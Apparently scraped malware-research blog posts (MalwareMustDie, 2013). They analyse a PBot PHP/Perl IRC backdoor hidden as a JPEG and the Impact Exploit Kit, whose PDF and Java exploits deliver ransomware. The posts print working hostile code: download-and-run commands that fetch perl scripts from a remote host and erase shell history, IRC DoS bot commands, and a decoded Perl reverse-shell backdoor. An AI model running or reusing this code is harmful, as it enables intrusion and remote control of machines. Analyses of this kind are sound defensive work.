| |\___ ns2.newrect.com [oqivynle.ru] (95.57.146.216) Got authoritative answer
| |\___ ns4.newrect.com [oqivynle.ru] (118.35.96.145) Got authoritative answer
| \___ ns3.newrect.com [oqivynle.ru] (89.228.55.91) Got authoritative answer
|\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns5.newrect.com [oqivynle.ru] (89.43.191.93) Got authoritative answer
| |\___ ns4.newrect.com [oqivynle.ru] (82.211.161.239) Got authoritative answer
| |\___ ns2.newrect.com [oqivynle.ru] (92.240.37.150) Got authoritative answer
| |\___ ns1.newrect.com [oqivynle.ru] (178.150.227.84) Got authoritative answer
| |\___ ns3.newrect.com [oqivynle.ru] (118.35.96.145) (cached)
| \___ ns6.newrect.com [oqivynle.ru] (84.205.30.45) Got authoritative answer
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
|\___ e.dns.ripn.net [ru] (193.232.142.17)
| |\___ ns4.newrect.com [oqivynle.ru] (178.52.52.126) *
| |\___ ns3.newrect.com [oqivynle.ru] (60.196.154.12) Got authoritative answer
| |\___ ns6.newrect.com [oqivynle.ru] (31.11.86.91) Got authoritative answer
| |\___ ns5.newrect.com [oqivynle.ru] (178.210.153.47) Got authoritative answer
| |\___ ns2.newrect.com [oqivynle.ru] (89.191.165.117) Got authoritative answer
| \___ ns1.newrect.com [oqivynle.ru] (188.26.249.96) Got authoritative answer
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
|\___ f.dns.ripn.net [ru] (193.232.156.17)
| |\___ ns6.newrect.com [oqivynle.ru] (212.160.231.215) Got authoritative answer
| |\___ ns4.newrect.com [oqivynle.ru] (86.106.92.7) Got authoritative answer
| |\___ ns5.newrect.com [oqivynle.ru] (5.105.62.233) Got authoritative answer
| |\___ ns3.newrect.com [oqivynle.ru] (46.109.99.63) Got authoritative answer
| |\___ ns2.newrect.com [oqivynle.ru] (91.190.57.250) Got authoritative answer
| \___ ns1.newrect.com [oqivynle.ru] (95.84.197.10) Got authoritative answer
|\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
\___ d.dns.ripn.net [ru] (194.190.124.17)
|\___ ns6.newrect.com [oqivynle.ru] (197.159.13.140) *
|\___ ns2.newrect.com [oqivynle.ru] (86.100.148.17) Got authoritative answer
|\___ ns1.newrect.com [oqivynle.ru] (46.172.100.70) Got authoritative answer
|\___ ns3.newrect.com [oqivynle.ru] (109.239.41.28) Got authoritative answer
|\___ ns5.newrect.com [oqivynle.ru] (46.109.125.151) *
\___ ns4.newrect.com [oqivynle.ru] (91.196.45.235) Got authoritative answer

#MalwareMustDie - Happy New Year to friends & crusaders!

A PBot (PHP + Perl Backdoor IRC Bot + Network Attack Tool) Infection on hegeman.com

$
0
0
PBot is a remote IRC Protocol Bot for usually used for taking over the infected machine into network malicious tool for PortScanning, DoS + etc acts.
It has been a long time for analyzing an active PBot, our previous post abut Pbot are here>>[CLICK]. This new one just spotted accidentally in my watch this new year. I trailed back infection started from before Christmas and noted its activities until yesterday. There's nothing special about this infection instead the ignorance of the domain owner which I informed him by severeal times, without getting response nor removal act.

This PBot is a plain textual script, camouflage its filename with a JPEG file extension, yes it contains some severe malicious functionalities of PBot which people should know about.

Below is the capture of its GUI, if you know how to execute this well:
(click to enlarge the pic below)

Victim: hegeman.com, Infection method probability: credentials (90%), hacked (10%)
Contacts: (for alert information)
Registrant:
Hegeman Nijverdal BV
Postbus 224
Nijverdal, 7440AE, NL
Administrative Contact:
Hoksbergen, B b.hoksbergen@hegeman.com
Postbus 224
Nijverdal, 7440AE, NL +31.548611000
Technical Contact:
Diensten, Online kpni@kpn.com
Maanplein 55
Den Haag, 2516CK, NL +31.8000403
Infected/Injected URLs:
h00p://hegeman.com/configs.jpg
h00p://hegeman.com/images/configs.jpg
h00p://hegeman.com/tmp/configs.jpg?
h00p://www.hegeman.com/configs.jpg
h00p://www.hegeman.com/images/configs.jpg
h00p://www.hegeman.com/tmp/configs.jpg
My log in downloading above url to get sample:
Resolving hegeman.com... seconds 0.00, 213.75.22.52
Caching hegeman.com => 213.75.22.52
Connecting to hegeman.com|213.75.22.52|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5448 (new refcount 1).
GET /configs.jpg HTTP/1.0
Accept: */*
Host: hegeman.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 04 Jan 2013 07:34:48 GMT
Server: Apache/2.0.52 (Red Hat) FrontPage/5.0.2.2635
Last-Modified: Thu, 03 Jan 2013 00:44:47 GMT
ETag: "961813c-99e7-ab6eddc0"
Accept-Ranges: bytes
Content-Length: 39399
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg
200 OK
Registered socket 1896 for persistent reuse.
Length: 39,399 (38K) [image/jpeg]
17:39:35 (10.59 KB/s) - `configs.jpg' saved [39399/39399]
What looks like an image JPEG file is actually a script, to be executed under infected machine's PHP from remote via infected url. Let's see the significant malicious points of this script: The header of this PBot:
_/  |_ __ _____  ___       _____|  |__ _____     __| _/______  _  __
\ __\ | \ \/ / / ___/ | \\__ \ / __ |/ _ \ \/ \/ /
| | | | /> < \___ \| Y \/ __ \_/ /_/ ( <_> ) /
|__| |____//__/\_ \_____/____ >___| (____ /\____ |\____/ \/\_/
\/_____/ \/ \/ \/ \/
<br/><?
$dir = @getcwd();
echo "DON TUKULESTO <br>";
$OS = @PHP_OS;
echo "OSTYPE :$OS <br>";
echo "uname -a; $uname <br>";
$free = disk_free_space($dir);
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {
echo "SM: 1 \\ ";
It downloads the components from remote:
$url="h00p://miri.wap.sh/";
exec('cd /tmp;curl -O '.$url.'mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;GET '.$url.'mild.txt > mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;wget '.$url.'mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;lwp-download '.$url.'mild.txt;perl mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;fetch '.$url.'mild.txt >mild.txt;perl mild.txt;rm -rf mild.txt*;');
Or download from "other" server with varied method of execution like: exec, @popen, shell_exec, system, passthru, etc..., i.e.:
@popen('cd /tmp;wget '.$url.'perl.txt;perl perl.txt irc.indoforum.org;rm perl.txt*;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'perl.txt; perl perl.txt irc.indoforum.org;rm perl.txt*;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
 :
This PBot has the connectivity contains the bad actor's IRC ID behind it:
var $config=array("server"=>"irc.javairc.org",  // ip/host da rede
"port"=>"6667", // porta da rede
"pass"=>"", // senha da rede
"prefix"=>"dos", // nick do bot
"maxrand"=>"4", // quantidade de numero no nick do bot
"chan"=>"#seve", // canal que os bots vao entrar
"chan2"=>"#seve", // canal aonde os bots v縊 mandar as vulns ao conectar (-n)
"key"=>"sempakz", // senha do canal
"modes"=>"+p", // modos do bot
"password"=>"sempakz", // senha pra acesso (.user SENHA)
"trigger"=>".", // prefico dos comandos
"hostauth"=>"@newbie.aja" // host dos owners (* for any hostname)
Below are Pbot's (basic) commands, you'll see some remote act + TCP/UDP flood commands..
*  .user <password> //login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
* .mail <to> <from> <subject> <msg> //send an email
* .dns <IP|HOST> //dns lookup
* .download <URL> <filename> //download a file
* .exec <cmd> // uses exec() //execute a command
* .sexec <cmd> // uses shell_exec() //execute a command
* .cmd <cmd> // uses popen() //execute a command
* .info //get system information
* .php <php code> // uses eval() //execute php code
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
* .udpflood <target> <packets> <packetsize> <delay> [port] //udpflood attack
* .raw <cmd> //raw IRC command
* .rndnick //change nickname
* .pscan <host> <port> //port scan
* .safe // test safe_mode (dvl)
* .inbox <to> // test inbox (dvl)
* .conback <ip> <port> // conect back (dvl)
* .uname // return shell's uname using a php function (dvl)
The callback is as per below function, to be saved+executed locally with perl (dc.pl):
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
Whatever the above base64 hashed code is, never be good, Let's decode it to find out what it is.. end up w/the backdoor logic:
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
↑Now we know how this Bot connect motherships, this protocol can be used to send/receive data. The Virus Total detection ratio is not bad at all:
MD5: 06a940dd7824d6a3a6d5b484bb7ef9d5 File size: 38.5 KB ( 39399 bytes ) File name: configs.jpg File type: PHP Detection ratio: 29 / 46 URL:------>>[CLICK]
I wonder why the owner won't delete this script from the server.. For more research of the recent PBot infections, below are infected urls:
h00p://eskipazari・com/images/products/large/rabot.txt
h00p://www.bohmans・ru/netcat/modules/forum2/images/pbbb.txt
h00p://asiandogs.・u/dog/crime/byroe.jpg
h00p://agefocus・net/wp-includes/js/jcrop/six/star.jpg
h00p://myghost.myqr・sg/bbs/logs/rabot.txt
h00p://www.nenskinder・com/wp-content/rabot.txt
h00p://www.airsoftpark・com/custompatchimg/pa.txt
h00p://neverbeentobali・com/wp-content/rabot.txt
h00p://flickr.com.oyun-max・com/bot.txt

#MalwareMustDie!


Let's say Hello! to Impact Exploit Kit w/ RansomWare Infector

$
0
0
This is an investigation of what we initially thought an unknown exploit kit case, thank's to our friends (@Set_Abominae & @MalwareSigs) for recognizing it & adviced us as Impact Exploit Kit.
The investigation was done two days in a row, scattered in our twitter for there are only some minutes to do it within daily work, by some request I dare myself to gather the documentations & put into this post. So here we go!

It starts with the two infector urls pointed to IP 217.23.6.57 below:
afgarcia67.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070   
davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070
These are possibility of domain names used for this EK infector:
hhmarshall1971.net
marshallfred26.net
afgarcia67.net
martinkashley87.net
davidsonfrc89.net
rosettasgiantonio9.net
We fetch it as per below:
=> `lavaafly.php@janeoleg=875070'
Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
Caching davidsonfrc89.net => 217.23.6.57
Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
:
GET /Jdowu32ds2s/lavaafly.php?janeoleg=875070 HTTP/1.0
User-Agent: #MalwareMustDie Playing with your jars
Accept: */*
Host: davidsonfrc89.net
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 07:30:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
:
200 OK
URI content encoding = `UTF-8'
Length: unspecified [text/html]
Saving to: `lavaafly.php?janeoleg=875070'
2013-01-08 16:30:35 (33.6 KB/s) - `lavaafly.php?janeoleg=875070' saved [29766]
Ending up with the landing page of this exploit kit. We neutralized the code here for analysis purpose -->>[PASTEBIN]

Landing Page Script Structure

As always we mentioned, it's important to recognize the structure of a landing-page's script. The current one is like the below formats:
// first applet with jar download..
<applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1">
<param name="bhjwfffiorjwe" value="0jfX19NXhX1...CgjC0.Ch3B2lCjZdp">
</applet>

// second applet with jar download..
<applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1">
<param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt.../hkgjNZVkgp">
</applet>

// some html..
<html><body></body>

//a customized plugindetect script contains "actojack"pdf for exploit..
<script type="text/javascript">
var actojack=
{ version:"ruptable",name:"actojack",handler:function(c,b,a)
{ return function()
{ c(b,a)


,isDefined:function(b)
{ return typeof b!="undefined"
:
:
pdfver = actojack.getVersion("AdobeReader");
if (typeof pdfver == "string")
{ pdfver = pdfver.split(",");
pdfver[3] = pdfver[3].substring(0, 1);
pdfver = parseInt(pdfver.join(""), 10);
} else
{ pdfver = 0; }
function ifr(abc)
{var dh = document.createElement("iframe");
dh.setAttribute("width", 1);
dh.setAttribute("height", 1);
dh.setAttribute("src", abc);
document.body.appendChild(dh);
};
function pdf()
{ try
{ if((pdfver>=8000&&pdfver<=8200)||(pdfver>=9000&&pdfver<=9301))
{ ifr("lacecape.php"); } }
catch(e) { }

setTimeout(pdf,2110);
There are a PDF for exploit & two JAR download infector files in the landing-page, no obfuscation used, just a condensed/compressed code used.

PDF Exploit

Here's the function for downloading PDF via IFRAME:

:
function ifr(abc)
{ var dh = document.createElement("iframe");
dh.setAttribute("width", 1);
dh.setAttribute("height", 1);
dh.setAttribute("src", abc);
document.body.appendChild(dh); };
:
It was called by the function pdf() below:
function pdf()
{ try
{ if((pdfver>=8000&&pdfver=9000&&pdfver { ifr("lacecape.php");
The download PDF path is a self explanatory in the code, go figure :-) These both functions are located in the end of the script. The PDF itsef has the script in the address 0x415-0x144A , with the structure below:
// variable settings..
ozsmpkoqb="affsdfsa";
var oazgntrlz = "tw%kf";
ivtwcjqa=event.target;
vjbvirqrz=this.w[ivtwcjqa.info.Date];

//obfuscation pattern under a string in a function...
function cskfhyrah(){return("q1ggh55jre..jre0Aq1ggh55jre7Dq1ggh55jre0A")}

//deobfuscation generator...
vjbvirqrz("ddyoxazmq=cskfhyrah().repl"+"a"+"ce(/q1ggh55jre/g,oazgntrlz.charAt(2));");
bpzritaa=ddyoxazmq;
vjbvirqrz(unescape(bpzritaa));

/*----end of structure----*/

// additional: obfuscation pattern :
q1ggh55jre2Bq1ggh55jre58q1ggh55jre6Eq1ggh55jre51q1ggh55jre
h55jre42q1ggh55jre63q1ggh55jre69q1ggh55jre2Fq1ggh55jre76q1
re37q1ggh55jre79q1ggh55jre35q1ggh55jre76q1ggh55jre4Cq1ggh5
q1ggh55jre38q1ggh55jre37q1ggh55jre2Bq1ggh55jre74q1ggh55jre
h55jre62q1ggh55jre49q1ggh55jre43q1ggh55jre36q1ggh55jre77q1
re4Dq1ggh55jre6Dq1ggh55jre69q1ggh55jre56q1ggh55jre77q1ggh5
q1ggh55jre2Bq1ggh55jre76q1ggh55jre4Cq1ggh55jre7Aq1ggh55jre
h55jre4Bq1ggh55jre6Cq1ggh55jre63q1ggh55jre34q1ggh55jre36q1
Noted the obfuscation under a function to avoid automation, and the obfs pattern contain repetition of "q1ggh55jre" strings. The first decoding key is using the line provided in he script below:
vjbvirqrz("ddyoxazmq=cskfhyrah().repl"+"a"+"ce(/q1ggh55jre/g,oazgntrlz.charAt(2));");
Which will burp you the other obfs script, if you runs it down you'll see strings below:
gwvtcewuw = "SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
:
xe5HAMAAIs0JIn3VoA+XnQGrDS8quL6w+jk////4jHKqFTmvby8
Bci/vLw1e08YQ1wxDLS/vLxU+L28vCsxI7y5vLzWtuHxszgsvLy
86utU1728vNQ8vry87+tUhL28vDl8yL5XXNTdPWVzVA6+vLxDbI
C6wKRUz728vIG8nLy8wbDvVBG8vLw5fMmiVwTvVNi8vLw5fMmuj
XzYN/ykN/yIgVi+vLzIZlcg6zVL1kPljXxAThIr4zyEvMi/Klc4
64181kPlQE7aE3v7Qoe8jbzj1Dy+vLzv61QHvLy81E5nyBFUO72
8vNQk0/OB7FQKvby81rzWQkNs6TVZ1ujllXDcMcCYnOuNfE8W4z
HLrNb4M7qNZ9Q0Qg+qVLi+vLzr6u/v7+/v7+9DybRDbDX4mKDddX
:
↑The string contains the exploit and shellcode infector. We manually decoded this PDF infector here -->>[PASTEBIN]By the way it exploits, we recognize that LibTIFF CVE-2010-0188 is used. The PoC of malware download via this infector PDF:
GET /Jdowu32ds2s/janudent.php HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_04
Host: davidsonfrc89.net
:
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Mon, 07 Jan 2013 07:13:48 GMT
Content-Type: application/x-msdownload
Content-Length: 81136
Connection: keep-alive
Pragma: public
Expires: Mon, 07 Jan 2013 07:13:48 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="0959c.exe"
Content-Transfer-Encoding: binary
MZ......................@........................
.......................!..L.!This program cannot be run in DOS mode.

The JAR Exploits

Two applets was detected at the head of the landing-page's code:
<applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1">
<param name="bhjwfffiorjwe"
value="0jfX19NXhX1MMX0ZltNjk9k/agtjNgs9hgZpBVthZX8.:jfg2.8/N/sljhaf0f/2lMBM9atrZag3Bd38oXfVNsB.fs0jC1BhtgeMZ/8j.30tajCCNNZtt9sX/0Ndga98shkk0CsCVN3VgB0gVkfs09kZi30MBdV..aNsfVftf3nV99fkgt2tBf/jas1.o2sXt2XtfnVh./hj8.itVfkaftCoC/30aCV399d/B1/3M.j8gBljBsn33h/khB9efZZglsj3thkNasMNg/j8.glXXtJZ8.CdXMNdt33ststhohXMZ/38dw92B8gl32u.8Zkg30g39BX21Xkl2lCXaXMjfdj8kC/aZ/s33sf280C2ZdMk9Cj3sd2/1jdaN/adltfB/kjNlNf/k3gaMhBk/8aknVt3/d.MjukXjZldVCdfs/dh2C1ekk3st.f0n.dCdkaZgtB120/Nhj.CjZ.al0jpjCgjC0.Ch3B2lCjZdp">
</applet>

<applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1">
<param name="bhjiorjwe"
value=".f//9jkMhNVgB1l2tt0djf3j32t21/Z.M0.p1C3X3a/g:1h.ZM2Zs/t1Z/.g92/l0flsta8rV/gXth/1oV3dl0Vj1sM1VMlZjdesXffXhsdtfN1h2VlNtBfCf.8tgaB020sa3fsBkBsX0g8gdlka9jXhiBkVXtV/Cah1fZ9d1gnghX/t39jtt.f2d2k9o.2htZjV2nt/j2ktdXih1NgVfC0oj/NZ90j19NB9.8M98.gaVXa8lMnCC2f3ZtsegXCsd331tZ00hlZdN/N8aB1ktgJ980Vf09Vdjg2Zj0k1og3lNhft8wkaZ/dZf.uftCC0Mf/32lMl9C8k2N/V8dV0Md1kh/CC//sCBBh.8f22/131h132s0BV/dgh//XV3kj2s3jg0jgBXkNajljC8sMXn0lZ/N93tuM9d0CgCtdl8gVMBk0eVMfNB1tjn8Ndhflg0t3CMX.aXa.//0hN3akpfhV8l0s/hkgjNZVkgp">
</applet>
We'll see two downloadable paths & fecth them:
GET /Jdowu32ds2s/rgerding/jimmdemy.jar HTTP/1.0
:
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 09:32:58 GMT
Content-Type: application/x-java-archive
Content-Length: 9465
Connection: keep-alive
Last-Modified: Sun, 30 Dec 2012 11:22:55 GMT
ETag: "39a0afc-24f9-4d2101e35e1c0"
Accept-Ranges: bytes
:
200 OK
Length: 9,465 (9.2K) [application/x-java-archive]
18:33:01 (27.40 KB/s) - `jimmdemy.jar' saved [9465/9465]

GET /Jdowu32ds2s/rgerding/torylane.jar HTTP/1.0
:
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 09:36:01 GMT
Content-Type: application/x-java-archive
Content-Length: 5502
Connection: keep-alive
Last-Modified: Tue, 25 Dec 2012 05:55:36 GMT
ETag: "39a0afd-157e-4d1a6f66da600"
Accept-Ranges: bytes
:
200 OK
Length: 5,502 (5.4K) [application/x-java-archive]
18:36:04 (18.70 KB/s) - `torylane.jar' saved [5502/5502]
These jars contains exploits of CVE-2012-1723 & CVE-2012-5076. The complete JARs exploit analysis guide is in here --->>[PASTEBIN]

Payload

Through the infection of this landing page you'll get exploited by either PDF or JARs and get same payload as per below PDF network traffic as evidence;
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Mon, 07 Jan 2013 07:13:48 GMT
Content-Type: application/x-msdownload
Content-Length: 81136
Connection: keep-alive
Pragma: public
Expires: Mon, 07 Jan 2013 07:13:48 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="0959c.exe"
Content-Transfer-Encoding: binary
MZ......................@........................
.......................!..L.!This program cannot be run in DOS mode.
$.........;<..uo..uo..uo..fo..uo.>Uo...o..UoRich..Uo........................PE..L...LL.P................
. ..........p.
:
It is a PE binary file
Sections:
.text 0x1000 0x1e5a 8192
.data 0x3000 0x7a14 31232
.rsrc 0xb000 0x66d8 26624
.reloc 0x12000 0x380 1024

Compilation timedatestamp.....: 2013-01-05 15:52:44
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001B70

0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 C6 FC 3B 3C 82 9D 55 6F 82 9D 55 6F 82 9D 55 6F ..;<..uo..uo..uo>0090 0C 82 46 6F 81 9D 55 6F A5 5B 2E 6F 8D 9D 55 6F ..Fo..Uo.[.o..Uo
00A0 82 9D 54 6F 21 9D 55 6F 82 9D 55 6F 83 9D 55 6F ..To!.Uo..Uo..Uo
00B0 9C CF D6 6F 83 9D 55 6F 9C CF C1 6F 83 9D 55 6F ...o..Uo...o..Uo
00C0 9C CF C4 6F 83 9D 55 6F 52 69 63 68 82 9D 55 6F ...o..UoRich..Uo
00D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00E0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00 ........PE..L...
00F0 4C 4C E8 50 00 00 00 00 00 00 00 00 E0 00 02 01 LL.P............
: :
↑hello Ransomware! Please be careful if you test this sample.. If we check itto Virus Total further:
SHA256: 57d2f97502f161d290e6300c74b36ba1c7e0de914fc7d6dec4e55d763841be2f SHA1: 311360a772cdcd942f3fc7696e739e941be5d4ec MD5: fba8bbf5b9a6079ace6621b879aec31a File size: 79.2 KB ( 81136 bytes ) File name: ifgxpers.exevr File type: Win32 EXE Tags: peexe Detection ratio: 10 / 44 Analysis date: 2013-01-07 23:11:44 UTC ( 1 day, 11 hours ago ) URL -->>[VirusTotal]
With Malware names:
DrWeb                    : Trojan.MulDrop4.20350
TrendMicro : HS_RANSDIGI.SM
TrendMicro-HouseCall : TROJ_GEN.F47V0107
Emsisoft : Trojan.Win32.Agent.AMN (A)
Kaspersky : Trojan-Ransom.Win32.Blocker.agrk
Malwarebytes : Trojan.FakeMS
ViRobot : Trojan.Win32.A.Blocker.81136
Panda : Trj/Ransom.AB
SUPERAntiSpyware : Trojan.Agent/Gen-Kryptic
Comodo : TrojWare.Win32.Trojan.Agent.Gen

Research & Samples

The samples & captures data are shared here --->>[MEDIAFIRE]Pic of the materials shared in this analysis: Virus Total Detection Ratio of Overall Samples (Click the Ratio for details)
File's Time-Stamp Size Name Ratio MD5 ------------------------------------------------------------------------------ 2013/01/09 19:08 81,136 0959c.exe VT(23/46) fba8bbf5b9a6079ace6621b879aec31a 2013/01/08 15:25 5,612 janudent.pdf VT(7/46) ed7c9c976ac0f3399c6928ddad43b739 2012/12/30 20:22 9,465 jimmdemy.jar VT(7/46) be2bcd6c3f2aee6432358e1fb37a8dc2 2012/12/25 14:55 5,502 torylane.jar VT(1/46) ae66fc69244abec22f20384356806ad2 2013/01/08 16:30 29,766 lavaafly.php VT(1/46) 6305989da0c9ac0f4c1fd138b22d634e

Some crime investigation & evidence

We're sure that the person behind this ID: davidsonfrc89@yahoo.com is responsible.
> davidsonfrc89.net
Server: google-public-dns-a.google.com
Address: 8.8.8.8

davidsonfrc89.net
primary name server = ns1.topdns.me
responsible mail addr = davidsonfrc89@yahoo.com
serial = 1357651830
refresh = 10800 (3 hours)
retry = 3600 (1 hour)
expire = 432000 (5 days)
default TTL = 38400 (10 hours 40 mins)
davidsonfrc89.net nameserver = ns1.topdns.me
davidsonfrc89.net nameserver = ns2.topdns.me
davidsonfrc89.net internet address = 217.23.6.56
>
>
> afgarcia67.net
Server: google-public-dns-a.google.com
Address: 8.8.8.8

afgarcia67.net
primary name server = ns1.topdns.me
responsible mail addr = davidsonfrc89@yahoo.com
serial = 1357651830
refresh = 10800 (3 hours)
retry = 3600 (1 hour)
expire = 432000 (5 days)
default TTL = 38400 (10 hours 40 mins)
afgarcia67.net nameserver = ns1.topdns.me
afgarcia67.net nameserver = ns2.topdns.me
afgarcia67.net internet address = 217.23.6.56

Good Reference of the Impact Exploit Kit

(Click the number to jump to reference page)
[0] Impact Exploit Kit CURRENT Reported Infection URL [1] Kahu Security: New Exploit Kits [2] Malware don't need Coffee: Inside Impact Exploit Kit - back on track (?) [3] MalwareSigs: Impact Exploit Kit
#MalwareMustDie!

A double hit - PC Trojan W32/VBS Bicololo and Mobile Java Android/Trojan SMS Apps via a hacked Wordpress site

$
0
0
